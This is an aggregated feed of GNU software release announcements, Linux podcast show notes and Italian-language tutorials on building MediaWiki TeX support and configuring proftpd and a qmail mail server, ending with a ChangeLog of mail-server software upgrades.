Monoprice 24-port Cat5e Patch Panel

 

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

cssc @ Savannah: CSSC-1.5.0-rc3 is released

This is to announce CSSC-1.5.0-rc3, a beta release.

This is a release candidate for a future stable 1.5.0 release.

There have been 46 commits by 2 people in the 109 weeks since CSSC-1.5.0-rc2.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

  Greg A. Woods (1)
  Paul Bryce (2)
  James Youngman (43)

James
==================================================================

Here is the GNU CSSC home page:
    https://gn ... rg/s/CSSC/

Here are the compressed sources and a GPG detached signature:
  https://alpha.gnu ... -1.5.0-rc3.tar.gz
  https://alpha.gnu ... .0-rc3.tar.gz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.o ... rg/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  File: CSSC-1.5.0-rc3.tar.gz
  SHA256 sum:   a78bc23062b11c33a858acd8a08c173ea2957f763f5b7ddb2990c0fee7c71cec
  SHA3-256 sum: 20733dd3c517c1bb44c67088b1a208ebf00e1eab4ab21e806bd963869faf918a

Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.

Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify CSSC-1.5.0-rc3.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096 2015-12-24 [SC]
        0CF4 E8D8 7159 3224 8428  32B8 88DD 9E08 C5DD ACB9
  uid   James Youngman <james@youngman.org>
  uid   James Youngman <jay@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key james@youngman.org

  gpg --recv-keys 88DD9E08C5DDACB9

  wget -q -O- 'https://savannah. ... SC&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify CSSC-1.5.0-rc3.tar.gz.sig

This release is based on the CSSC git repository, available as

  git clone https://https.git ... .org/git/CSSC.git

with commit 26add75e45f79cd493409ee2f0c2646849314aad tagged as v1.5.0-rc3.

For a summary of changes and contributors, see:

  https://gitweb.gi ... tlog;h=v1.5.0-rc3

or run this command from a git-cloned CSSC directory:

  git shortlog 43b5b054701732df7ce24eb59821010c39c60cb6..v1.5.0-rc3

This release was bootstrapped with the following tools:
  Autoconf 2.72
  Automake 1.17
  Gnulib 2026-06-08 88592a2880cf39a2f597cd0294a90d8dd7faa2df

NEWS

  • Noteworthy changes in release 1.5.0-rc3 (2026-06-14)


        * Some typos in error message have been fixed.

        * admin now supports combination of -r with -n as well as the
          portable combination of -r with -i.

        * Support "sccs sact"; the sact program already existed but
  could not previously be invoked via the sccs wrapper.
  Thanks to Greg A. Woods for this improvement.

        * In some places we now prefer "grep -E" to "egrep" in order
          to avoid a warning message from GNU grep.  Some very old
          versions of Unix may not support this option.

        * Various C++ portability improvements.

  • Updated version of gnulib.


  • Updated version of googletest; this is now at the last

          version at which it still supported building with Automake.

  •  

2.5 Admins 303: Denial of Secrets

People were locked out of their password managers to stop a brute force attack, Coreutils come to Windows, a FreeBSD PR effort backfires, and the best simple consumer WiFi gear.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Why ZFS Is the Ideal Filesystem for Multi-User/Department Media Production

Webinar: June 30th @ 11am EDT: FreeBSD After Hours AMA

 

News/discussion

Password manager Dashlane suspends customer accounts amid brute-force attacks

Microsoft Announces Coreutils For Windows: Derived From Rust Coreutils

Coreutils for Windows

FreeBSD Foundation Executive Director Tries Daily Driving FreeBSD On Laptop

 

Free consulting

We were asked about the best simple consumer WiFi gear.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

Late Night Linux – Episode 389

A new Firefox release confuses Félim, Plex makes no sense in a world where Jellyfin exists, Will considers paying for the Kagi search engine, and another small Android tablet for your wall. Plus what we learned at the recent Ubuntu Summit.

 

News/discussion

Firefox 151.0, See All New Features, Updates and Fixes

New Lifetime Plex Pass Pricing

Kagi

Shelly Wall Display

 

Ubuntu Summit

Ubuntu Summit 26.04 Timetable

Ubuntu Summit videos

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

gnutrition @ Savannah: GNUtrition 0.33

GNUtrition 0.33 is now released. This marks the first release of GNUtrition since 2012, approximately 14 years ago!

GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release is a complete rewrite of GNUtrition in C rather than Python 2 with a new GTK 3 interface replacing the old GTK 2 one. The Nutrient Database of Standard Reference, which stopped getting updated in 2018, was replaced with the USDA Food and Nutrition Database for Dietary Studies. With help from some test volunteers, the build and installation process was better streamlined to resolve critical issues and difficulties so that GNUtrition can be a better program overall.

Considering the time between releases, GNUtrition currently is not available on OS package repositories (as far as I am aware). If you package software for your operating system's package manager, it would be very helpful if you could start packaging GNUtrition so that it may be even more easily used by people on said systems. If you don't, you may still request to those who do to start including GNUtrition.

Thank you to everyone who tested/used GNUtrition 0.33's release candidates and provided meaningful feedback on its functionality, design, and so on. I would also like to especially thank Jason Self for providing us with the C rewrite in the first place.

More information about GNUtrition may be found on its home page at http://gnu.org/so ... tware/gnutrition/. This release can be obtained from the ftp.gnu.org server at one of the following:

ftp://ftp.gnu.o ... gnu/gnutrition/
http://ftp.gnu.or ... g/gnu/gnutrition/
https://ftp.gnu.o ... g/gnu/gnutrition/

The FTP mirror list is available at https://gnu.or ... order/ftp.html, and https://ftpmirror ... u.org/gnutrition/ will automatically redirect you to a nearby mirror.

Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

Happy hacking and calorie counting!!

  •  

2.5 Admins 302: ClawPilot

Microsoft threatens a security researcher for disclosing vulnerabilities publicly, bricks old versions of Office, and announces their version of OpenClaw. Plus keeping up with the latest technology.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Which ZFS Storage Metrics Matter for Database Performance

Webinar: June 25th @ 11am EDT: Understanding AnyRAID with Jon from HexOS

 

News/discussion

Microsoft under fire for threatening security researcher with criminal investigation

The researcher is a former MS employee says Krebs

Microsoft reaches for olive branch after public dustup with 0-day researcher

Microsoft is intentionally bricking all Office for Mac 2019/2021 installations

Introducing Microsoft Scout: Your always-on personal agent

 

Free consulting

We were asked about keeping up with the latest technology.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

libtool @ Savannah: libtool-2.6.1 released [beta]

Libtoolers!

The Libtool Team is pleased to announce the release of libtool 2.6.1, a beta release.

GNU Libtool hides the complexity of using shared libraries behind a
consistent, portable interface. GNU Libtool ships with GNU libltdl, which
hides the complexity of loading dynamic runtime libraries (modules)
behind a consistent, portable interface.

There have been 34 commits by 14 people in the 37 weeks since 2.6.0.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

  Alexandre Janniaux (4)
  Alexey Samsonov (1)
  Anthony Mallet (1)
  Arnold (1)
  Dima Pasechnik (1)
  Frederic Berat (1)
  Ileana Dumitrescu (15)
  KO Myung-Hun (4)
  Kirill Makurin (1)
  Mintsuki (1)
  Nicolas Boulenguez (1)
  Olly Betts (1)
  Patrice Dumas (1)
  Richard J. Mathar (1)

Ileana
 [on behalf of the libtool maintainers]
==================================================================

Here is the GNU libtool home page:
    https://gnu. ... g/s/libtool/

Here are the compressed sources:
  https://alpha.gnu ... tool-2.6.1.tar.gz   (2.1MB)
  https://alpha.gnu ... tool-2.6.1.tar.xz   (1.1MB)

Here are the GPG detached signatures:
  https://alpha.gnu ... -2.6.1.tar.gz.sig
  https://alpha.gnu ... -2.6.1.tar.xz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.o ... rg/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  File: libtool-2.6.1.tar.gz
  SHA256 sum:   52264ab2fca9464dea9f6a0355d39e49b18f40468b9b6dbc3d151a0dba307a4b
  SHA3-256 sum: 59826fb74043179c38a393448b92dfcdfbe9046fd3b23a7079665984f22d6688

  File: libtool-2.6.1.tar.xz
  SHA256 sum:   3fb21f1e99fcdd8565c9b00fb1371db457b82a0da7cba273e1617c954b0ad1ee
  SHA3-256 sum: 614bc3ed43293be989ec3305dae42fc4e81234429477490734a40f6d3316560b

Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.

Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify libtool-2.6.1.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096 2021-09-23 [SC]
        FA26 CA78 4BE1 8892 7F22  B99F 6570 EA01 146F 7354
  uid   Ileana Dumitrescu <ileanadumitrescu95@gmail.com>
  uid   Ileana Dumitrescu <ileanadumi95@protonmail.com>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key ileanadumitrescu95@gmail.com

  gpg --recv-keys 6570EA01146F7354

  wget -q -O- 'https://savannah. ... ol&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify libtool-2.6.1.tar.gz.sig

This release is based on the libtool git repository, available as

  git clone https://https.git ... g/git/libtool.git

with commit 79de7bb71bc0a1167f4c4ae8bd897976a0ff2b51 tagged as v2.6.1.

For a summary of changes and contributors, see:

  https://gitweb.gi ... shortlog;h=v2.6.1

or run this command from a git-cloned libtool directory:

  git shortlog v2.6.0..v2.6.1

This release was bootstrapped with the following tools:
  Autoconf 2.73
  Automake 1.18.1
  Gnulib 2026-05-12 722f67e9716bf914c18d468336c1f4f9e5cce915

NEWS

  • Noteworthy changes in release 2.6.1 (2026-06-04) [beta]


** New features:

  - Pass 'resource-dir=*' flag for Clang.

  - Recognise explicit shared library arguments when linking dependency
    libraries to a shared library, like exists when linking a program.

  - Support OpenMP with macOS clang by processing '-Xpreprocessor
    -fopenmp' as one token.

** Bug fixes:

  - Store cygpath file path conversions correctly for MSYS2 and MSVC.

  - Fix syntax error in LT_PROG_OBJC and LT_PROG_OBJCXX.

  - Separate Objective C and C++ cache check for proper tagging support.

  - Fix in darwin to support values with spaces.

  - Limit the length of DLL name to 8.3 correctly to avoid corrupting a
    generated DLL on OS/2.

  - Remove unused variable on OS/2, which could cause issues with static
    library generation if defined.

  - Recognise more static linking options for Clang.

  - Fix emscripten CXX postdeps using non-PIC sysroot.

  - Avoid deprecated option '-o' with MSVC compilers and replace with '-Fe'.

  - Avoid overlinking of dependency libraries on ELF systems.

  - Ensure old libraries are not archived.

** Changes in supported systems or compilers:

  - Add support for SlimCC compiler.

  - Add support for *-ironclad-gnu.


Enjoy!

  •  

qmail + vpopmail + Dovecot | Roberto's qmail notes

Quotando la definizione di D. J. Bernstein

qmail è un mail transfer agent semplice, sicuro ed affidabile. è stato progettato per dei server UNIX connessi alla rete internet

Riferimenti

E' possibile reperire una introduzione più che comprensibile su come funziona un mail server in questa pagina. Anche la  "qmail newbie's guide to relaying" di Chris Johnson (copia locale... è destino che tutto quello che riguarda qmail vada piano piano sparendo) è molto chiara e la sua lettura è fondamentale all'inizio.

Avvertenze

Lo scopo di questa piccola guida NON è insegnare come funziona un server di posta, anche se alla fine si spera che uno che l'abbia seguita riesca ad avere un server funzionante. Questi appunti servono principalmente a ricordare i passi principali da seguire per avere una installazione veloce di qmail e di alcuni software correlati. Ho deciso di scriverla a causa della mancanza di ogni aggiornamento della documentazione riguardante le "distribuzioni" di qmail che mi erano familiari, nella speranza che ciò possa essere di aiuto anche a qualcun altro. Ovviamente il divertimento è stato una componente decisiva.
Pertanto, per conoscere in dettaglio come funziona un mail server, sei invitato a leggere con cura almeno i riferimenti che menzionerò in ogni pagina.

In secondo luogo, NON sono io il responsabile di quello che fai con il tuo server ;-). Usa la mia guida a tuo rischio.

Infine, i commenti, le critiche e i suggerimenti sono sempre benvenuti! :-)

Quale distribuzione?

Questa guida è stata scritta senza una particolare distribuzione Linux in mente. L'ho testata su due miei server di posta virtuali basati su  Slackware, sia a 64 che a 32 bit, e diverse persone là fuori confermano che essa funziona nelle altre distribuzioni Linux più comuni. La compilazione dei miei pacchetti è stata testata anche su piattaforme FreeBSD, OpenBSD, NetBSD.

Un altro toaster?

Se vale la definizione data da Bernstein probabilmente lo è. Tuttavia, a mio modo di vedere, un toaster dovrebbe essere una cosa alla Bill Shupp o alla qmailtoaster, che viene rilasciata insieme a tutti i pacchetti necessari, diversamente da qui. Poichè preferisco lasciare che il visitatore controlli da sè l'esistenza delle ultime versioni dei vari software, direi che questa "cosa" non dovrebbe essere classificata come un toaster. Piuttosto la chiamerei semplicemente "Roberto's qmail notes". Per la verità, sto inserendo qui un paragrafo sul toaster giusto per soddisfare i motori di ricerca, dato che molta gente arriva qui cercando un toaster per qmail.. :-) e ora che ho scritto la parola toaster 5 o 6 volte possiamo veramente iniziare... :-))

Prima di iniziare...

Questi appunti sono stati scritti in inglese e poi tradotti in italiano alla velocità della luce. Si vede, vero? Rileggendo ora, trovo degli strafalcioni e delle traduzioni letterali alla "Google translate"!. Me ne scuso, ma non ho sempre il tempo di fare le cose nel modo migliore..

Licenza

Creative Commons License

Roberto's qmail notes is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.

  •  

gnutrition @ Savannah: GNUtrition 0.33.0rc5

A test release of GNUtrition, 0.33.0rc5, is now available.

GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release fixes bugs from 0.33.0rc1-rc4, removes inaccurate algorithm constants, removes additional unnecessary dependencies, improves reliability/usability on non-GNU systems, among other general improvements and bug fixes. Version 0.33.0 (the first ftp.gnu.org release of GNUtrition since 2012) is expected to be released by June 5th. Any and all testing for the upcoming release will be greatly appreciated. Please use the bug-gnutrition and help-gnutrition mailing lists for your bug reports and/or other questions.

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:

    ftp://alpha.gnu.o ... g/gnu/gnutrition/
    http://alpha.gnu. ... g/gnu/gnutrition/
    https://alpha.gnu ... g/gnu/gnutrition/

Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

  •  

Abilitare Tex su Mediawiki (Slackware)

Mediawiki offre la possibilità di inserire formule Tex nelle nostre pagine creando dinamicamente immagini PNG per noi..

Questa pagina vuole richiamare i pacchetti e i principali passi da seguire per far funzionare Tex con MediaWiki in una macchina Slackware. Alla fine presenterò alcune problematiche nell'installzione.

Ghostscript

Ghostscript è già incluso in Slackware (ap/ghostscript e ap/ghostscript-fonts-std)  ma se siamo in un server minimale potresti avere bisogno di installarlo.

libfontconfig

Questa libreria la troviamo all'interno del pacchetto x/fontconfig. E' richesta da ImageMagick.

ImageMagick

wget http://www.imagemagick.org/download/ImageMagick-6.7.6-5.tar.bz2
tar xvfj ImageMagick-6.7.6-5.tar.bz2
cd ImageMagick-6.7.6-5
chown -R root:root .

./configure \
        --without-x \
        --with-png \
        --with-freetype \
	--with-dps \
	--with-gslib
make
make install
ldconfig 

Test

Provare a digitare, dalla linea di comando

/usr/local/bin/convert logo: logo.gif

Se viene generato il file PNG tutto funziona come si deve.

Ocaml

wget http://caml.inria.fr/pub/distrib/ocaml-3.12/ocaml-3.12.0.tar.bz2
tar xjf ocaml-3.12.0.tar.bz2
cd ocaml-3.12.0
chown -R root:root .
./configure
make
make install

dvipng

Download: http://sourceforge.net/projects/dvipng/

Prerequisiti:

  • libgd (l/gd pkg)
  • libXpm (x/libXpm pkg), libxcb (x/libxcb), libXau (x/libXau) and  libXdmcp (x/libXdmcp) che sono prerequisiti di libgd.
  • Kpathsea (incluso nel pacchetto Tex, installare tutto ciò che vi è nel gruppo t/)
  • FreeType (pkg in l/freetype)
  • T1lib (l/t1lib)
  • libpng (l/libpng) and libz (l/zlib)
  • texinfo (ap/tekinfo)
PATH=$PATH:/usr/share/texmf/bin/
export PATH

Ricordare di salvare ciò anche nel profile.

Per evitare problemi nel link di kpathsea configurare come segue

./configure LDFLAGS='-L/usr/share/texmf/lib/' CPPFLAGS='-I/usr/share/texmf/include/'
make
make install

AMS-LaTeX

Senza AMS* alcune formule saranno rese correttamente mentre altre no. Il pacchetto tetex di Slackware contiene già AMS, comunque, nel caso non ce l'avessi:

cd /usr/share/texmf
wget ftp://ftp.ams.org/pub/tex/amslatex.zip
wget ftp://ftp.ams.org/pub/tex/amsrefs/amsrefs.zip
unzip amslatex.zip
unzip amsrefs.zip

dovresti trovarlo in /usr/share/texmf/tex/latex/amsmath/amsmath.sty

Abilitare Tex in Mediawiki

Cambiare directory dove è installato mediawiki, editare LocalSettings.php e decommentare questo:

$wgUseTeX = true;

Compilazione di texvc

cd /path/to/htdocs/mediawiki/math

Prima di compilare, per evitare un parse error, usare il PATH assoluto ovunque all'interno di math/render.ml in questo modo:

let cmd_dvips tmpprefix = "/usr/share/texmf/bin/dvips -q -R -E " ^ tmpprefix ^ ".dvi -f >" ^ tmpprefix ^ ".ps"
let cmd_latex tmpprefix = "/usr/share/texmf/bin/latex " ^ tmpprefix ^ ".tex >/dev/null"
(* Putting -transparent white in converts arguments will sort-of give you transperancy *)
let cmd_convert tmpprefix finalpath = "/usr/local/bin/convert -quality 100 -density 120 " ^ tmpprefix ^ ".ps " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_convert_error"
(* Putting -bg Transparent in dvipng's arguments will give full-alpha transparency *)
(* Note that IE have problems with such PNGs and need an additional javascript snippet *)
(* Putting -bg transparent in dvipng's arguments will give binary transparency *)
let cmd_dvipng tmpprefix finalpath backcolor = "/usr/local/bin/dvipng -bg \'" ^ backcolor ^ "\' -gamma 1.5 -D 120 -T tight --strict " ^ tmpprefix ^ ".dvi -o " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_dvipng_error"

Ora compiliamo

make

Problematiche

Provare a mettere dentro una pagina wiki qualcosa come

0

e cerchiamo di vedere cosa succede. Questo è il messaggio di errore più frequente:

Failed to parse (PNG conversion failed; check for correct installation of latex, dvips, gs, and convert)

Controlliamo se gli eseguibili sono nel path:

# ls -lH `which gs` `which latex` `which dvips` `which convert`
-rwxr-xr-x 1 root root 5977916 2008-12-05 23:36 /usr/bin/gs*
-rwxr-xr-x 1 root root   23410 2010-11-21 15:22 /usr/local/bin/convert*
-rwxr-xr-x 1 root root  209308 2007-06-28 04:51 /usr/share/texmf/bin/dvips*
-rwxr-xr-x 1 root root 1010984 2007-06-28 04:51 /usr/share/texmf/bin/latex*

Abilitiamo il log degli errori. Inserire una linea come questa in LocalSettings.php

$wgDebugLogFile = "/tmp/wiki.log";

Apriamo questo file e cerchiamo una riga come questa ;

TeX: ./math/texvc '/path/to/htdocs/mediawiki/images/tmp' '/path/to/htdocs/mediawiki/images/tmp' '0' 'UTF-8' 'transparent'
TeX output:
 Ccfcd208495d565ef66e7dff9f98764da0 0
---

Cerchiamo ora di eseguire il comando texvc dalla linea di comando come utente apache:

cd math
sudo -u apache ./texvc '../images/tmp' '../images/tmp' '0' 'UTF-8' 'transparent'

a controlliamo il PNG nella cartella images/tmp. Se si ottiene ancora un parse error, si ricontrolli il path assoluto in math/render.ml, e si ricompili. E si rileggano le referenze indicate.

  •  

Configurazione di proftpd con mod_tls o mod_sftp

Ecco come ho installato mod_tls (ftpes) e mod_sftp in proftpd. I miei tentativi di farli convivere in due demoni separati sono tutti falliti, giacchè ho registrato errori nel trasferimento che sono spariti solo quando ho provato a caricare mod_tls o mod_sftp a turno.

Questi i miei test sulla velocità (per la verità un po' frettolosi). ftpes sembra un pochino più veloce in modalità upload:

ftpes
upload: circa 22.4 K/s
download: più di 800 K/s

sftp
upload circa 18.2 K/s
download: più di 800 K/s

Le mie opzioni di configurazione:

./configure \
        --prefix=/usr/local \
        --without-pam --disable-auth-pam \
        --enable-openssl \
        --with-modules=mod_ratio:mod_readme:mod_sftp:mod_tls

file ftpes.conf

# common stuff goes here
Include /usr/local/etc/proftpd/proftpd.conf

<IfModule mod_tls.c>
TLSEngine on
PassivePorts 49152 65535
#MasqueradeAddress 012.345.678.901 # se il server e' dietro un firewall
TLSLog /var/log/proftpd/tls.log
TLSProtocol SSLv23
# Require protection on the control channel, but reject protection of the data channel
TLSRequired ctrl+!data
TLSRSACertificateFile /usr/local/etc/ssl/certs/proftpd.pem
TLSRSACertificateKeyFile /usr/local/etc/ssl/certs/proftpd.pem
TLSVerifyClient off
TLSRenegotiate none
</IfModule>

file sftp.conf

# common stuff
Include /usr/local/etc/proftpd/proftpd.conf

<IfModule mod_sftp.c>
SFTPEngine on
SFTPLog /var/log/proftpd/sftp.log
Port 22
SFTPHostKey /etc/ssh/ssh_host_rsa_key
SFTPHostKey /etc/ssh/ssh_host_dsa_key
SFTPCompression delayed
MaxLoginAttempts 6
</IfModule>

Infine avviare il demone richiamando il file di configurazione desiderato:

/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf # se si vuole ftpes
/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf  # se si preferisce sftp

Non avviarli mai insieme.

file proftpd.conf

ServerType standalone
UseReverseDNS off
DeferWelcome off

Port 21
Umask 022
MaxInstances 30

User ftp
Group ftp

SystemLog /var/log/proftpd/proftpd.log
TransferLog /var/log/proftpd/xferlog

<Global>

<Directory /*>
AllowOverwrite on
</Directory>

</Global>

<VirtualHost 123.456.789.123>

ServerName "ProFTPD"
DefaultRoot ~/www
DefaultServer on

</VirtualHost>

Startup script

#!/bin/sh
#
# /etc/rc.d/rc.proftpd
#

start() {
        /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf
#-n -d 20 for backup
#        /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf
        echo "Server started."
}

stop() {
        /bin/killall proftpd
        echo "Server stopped."
}

restart() {
        stop
sleep 3
        start
#/bin/killall -HUP proftpd
        echo "Server restarted."
}

case "$1" in
'start')
  start
  ;;
'stop')
  stop
  ;;
'restart')
  restart
  ;;
*)
  echo "usage $0 start|stop|restart"
esac

 

  •  

L'interprete Sieve e il server Dovecot ManageSieve

Il progetto Pigeonhole fornisce il supporto Sieve a livello di plugin per il Local Delivery Agent (LDA) di Dovecot e anche per suo servizio LMTP. Il plugin è un interprete Sieve che filtra i messaggi in arrivo usando uno script scritto in linguaggio Sieve. Lo script Sieve è fornito dall'utente e, con il suo utilizzo, l'utente può personalizzare come i messaggi in arrivo sono trattati. I messaggi possono essere spediti a una cartella specifica, reindirizzati, rispediti al mittente, scartati, etc.

Il Server Dovecot Managesieve è un servizio per gestire la collezione di script Sieve dell'utente.

Se vuoi supportare i filtri per le email, devi gestire le Sieve rules per mezzo del server dovecot-pigeonhole. Quando crei un filtro con la tua webmail o il tuo client di posta, stai scrivendo uno script in linguaggio Sieve per personalizzare il modo in cui i tuoi messaggi saranno recapitati, vale a dire se saranno inoltrati a qualcun altro, scartati o salvati in delle cartelle particolari. Ma per fare questo Dovecot deve agire anche come un Local Delivery Agent  al posto di vpopmail/vdelivermail, ovvero deve essere Dovecot a salvare i messaggi nella tua cartella Maildir. Questa guida cercherà di spiegare come raggiungere questo obiettivo.

  •  

ChangeLog

  • Jul 6, 2026
    - clamav-unofficial-sigs upgraded to v. 8.0.0
    - roundcube upgraded to v 1.7.2
  • Jul 1, 2026
    - I added notes on how to install an hCaptcha filter on mailman/Postorius
  • May 10, 2026
    roundcube upgraded to v. 1.7.1 (security release)
  • May 14, 2026
    - dovecot upgraded to v. 2.4.4
  • May 10, 2026
    roundcube upgraded to v. 1.7.0
  • Apr 7, 2026
    - qmail v. 2026.04.07
  • Mar 30, 2026
    - dovecot 2.4.3 released
  • Mar 4, 2026
    - clamav upgraded to v 1.5.2
  • Feb 11, 2026
    - vpopmail upgraded to v. 5.6.13
    - vqadmin upgraded to v. 2.4.6
  • Feb 8, 2026
    - vpopmail upgraded to v. 5.6.12
    - roundcube update to v. 16.13
  • Feb 3, 2026
    - qmail upgrade
  • Jan 31, 2025
    - vqadmin upgraded to v 2.4.5
  • Jan 8, 2026
    - qmail upgraded to v2026.01.08
  • Dec 14, 2025
    - roundcube upgraded to version 1.6.12
  • Nov 28, 2025
    - qmailadmin upgraded to v1.2.27
  • Nov 26, 2025
    - ezmlm-idx moved to my git space. Patched to compile with modern compilers. Fixed mysql documentation.
  • Nov 22, 2025
    - dovecot: quota driver switched to 'count'
    - vpopmail upgraded to v.5.6.11
  • Nov 8, 2025
    - qmailadmin upgraded to v 1.2.26
    - log file modified accordingly in fail2ban filter
  • Oct 30, 2025
    - vpopmail updated to v. 5.6.10
    - dovecot ugraded to v. 2.4.2
    - dovecot-pigeonhole ugraded to v. 2.4.2
  • Oct 22, 2025
    - qmailadmin updated to v 1.2.25
  • Oct 18, 2025
    - clamav upgraded to v 1.5.1
  • Oct 11, 2025
    - clamav upgraded to v 1.5.0. A recent version of rust is needed (successfully using 1.88 here). Just reinstall as explained below. No particular change is needed in the config files.
  • 3 ottobre 2025:
    - Aggiunta la sezione Data Query Service nella pagina relativa a RBL, che risolve il problema del ban di spamhaus da connessioni fatte con DNS pubblico.
  • Sep 30, 2025
    - daemontools v0.82: Fixed crash in multilog caused by invalid buffer access when read() returned -1
  • Sep 8, 2025
    - daemontools v. 0.81 compiles with latest gcc 15.2
    - qmail updated to v. 2025.09.08
  • Sep 1, 2025
    vpopmail v5.6.9
    - added -std=gnu17 to gain compatibility with gcc-15 (PR #6)
    - pw_clear_passwd field enlarged to varchar(128) to create room for long passwords (tx Ricardo Brisighelli) c54688d
  • Aug 31, 2025
    - upgraded ucspi-tcp6 and ucspi-ssl to v. 0.13.5
  • Aug 19, 2025
    - netqmail-1.07.1: now compiles with gcc 15.2
  • Aug 18, 2025
    spamassassin's bayesian filter: improved the "Training Bayes" section
  • Jul 10, 2025 qmail update
    - Authentication-Results: header support (Andreas Gerstlauer)
    - DKIM: added ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)
    - improved qmail-dkim error reporting when signing outgoing messages (Andreas Gerstlauer)
    - helodnscheck.cpp: qmail dir determined dinamically
    - qmHandle: Add -x and -X parametr for remove email by To/Cc/Bcc (by Stetinac)
  • Jun 9, 2025 qmail v.2025.06.09
    - CRLF fix for fastremote-3 patch (thanks Andreas Gerstlauer)
    - Bug fix to the greetdelay program (thanks Andreas Gerstlauer): qmail-smtpd crashes if SMTPD_GREETDELAY is defined with no DROP_PRE_GREET defined.
  • Jun 04, 2025
    - roundcube updated to v. 1.6.11
    - simscan updated to v. 1.4.6
  • Apr 19, 2025
    - sauserprefs upgraded to v. 1.20.2
  • Apr 18, 2025
    - qmail v2025.04.18: added script config-all.sh to automate the qmail core configuration (testing)
  • Apr 19, 2025
    - sauserprefs upgraded to v. 1.20.2
  • 4 aprile 2025
    - pubblicata una pagina con l'illustrazione del funzionamento di qmail, per quanto riguarda la configurazione suggerita in questa guida
  • Mar 29, 2025
    - dovecot and dovecot-pigeonhole updated to v. 2.4.1-4
    - vpopmail updated to v. 2.6.8 (have a look at the release notes)
  • Mar 23, 2025 (v. 5.6.7)
    - bug fix in vpopmaild.c: Crypted[64] enlarged to Crypted[128] to make room for SHA-512 passwords. This restores the usability of the RoundCube's 'password' plugin (commit)
    - fixed quota calculation in sql procedures for dovecot (tx Hakan Cakiroglu) (commit)
    - minor changes to the usage function of vmakedotqmail.c (commit)
  • Mar 19, 2025 daemontools version 0.79
    This version does not add new features nor corrects bugs. It's just a reorganizations of the files in the source dir
    - daemontools will be installed in /var/qmail/daemontools
    - Moved 'package' and 'src' to the top dir
    - Version grabbed from 'VERSION' in package/upgrade
  • Mar 17, 2025
    - added a patch to qmail-spp greylisting plugin to solve a compilation break on rocky 8 (tx Shailendra Shukla)
  • Mar 15, 2025
    -dovecot config: added quota warning messages handling
  • Mar 12, 2025
    - autorespond v 2.0.9: bug fix in memory allocation which caused a segfault when To: address has be used (tx Stephan for the hint)
  • Mar 9, 2025
    - dovecot: fixed quota calculation in sql queries (tx Hakan Cakiroglu)
    - Roundcube recognizes unlimited quota
  • Mar 5, 2025
    - solr upgraded to v. 9.8.0
  • Feb 22, 2025
    - Dovecot: Bug fix in 90-sieve.conf: global script to move spam into Junk now working
    - Let’s Encrypt have announced that they will end their free alerting service. Added a script to do the same internally.
  • Feb 15, 2025
    - vpopmail upgraded to v. 5.6.6. bug fix: pwstr.h was not installed by Makefile (tx Bai Borko)
  • Fedb 11, 2025
    qmail v. 2025.02.11
    - Several adjustments to get freeBSD and netBSD compatibility. More info in the commit history. Hints/comments are welcome.
    - freeBSD users have to comment out the "LIBRESOLV" variable from the very beginning of the Makefile, as libresolv.so in not needed on freeBSD.
    - Dropped files install-big.c, idedit.c and BIN.* files.
    - Dropped files byte_diff.c, str_cpy.c, str_diff.c, str_diffn.c and str_len.c, which break compilation on clang and can be replaced by the functions shipped by the compiler (tx notqmail).
    - Old documentation moved to the "doc" dir. install.c and hier.c modified accordingly
    - conf-cc and conf-ld now have -L/usr/local/lib and -I/usr/local/include to look for srs2 library
